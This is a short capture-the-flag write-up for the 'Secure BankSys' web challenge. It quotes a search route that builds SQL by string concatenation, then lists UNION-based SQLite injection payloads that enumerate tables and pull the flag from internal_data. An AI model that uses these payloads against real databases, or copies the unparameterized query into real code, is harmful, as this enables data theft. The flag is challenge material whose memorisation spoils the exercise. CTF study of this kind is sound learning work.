Ramadan's Spark CTF 2025 — Secure BankSys
Secure BankSys
Looking at the web app we find three pages: main page, accounts, and in the accounts tab we perform a simple SQL injection:
The vulnerability is in the /search route in app.py:
sql_query = f"SELECT account_number, customer_name, balance, account_type FROM accounts WHERE account_number LIKE '%{query}%' OR customer_name LIKE '%{query}%' OR account_type LIKE '%{query}%'"
User input is directly concatenated into the SQL query without parameterization.
We explore the database structure with UNION-based injection:
' UNION SELECT 1,2,3,4 --
This confirms 4 columns. To find table names:
' UNION SELECT 1, name, 3, 4 FROM sqlite_master WHERE type='table' --
Reveals tables: accounts, users, internal_data, search_logs.
To find columns:
' UNION SELECT 1,2,3,sql FROM sqlite_master WHERE tbl_name = 'internal_data' -- -
Extract contents:
' UNION SELECT 1, content, 3, 4 FROM internal_data --
Flag: Spark{G00d_J0B_K1nG_Y0u_4R3_C00k1nGG_1ZSQMLK9LQSX21}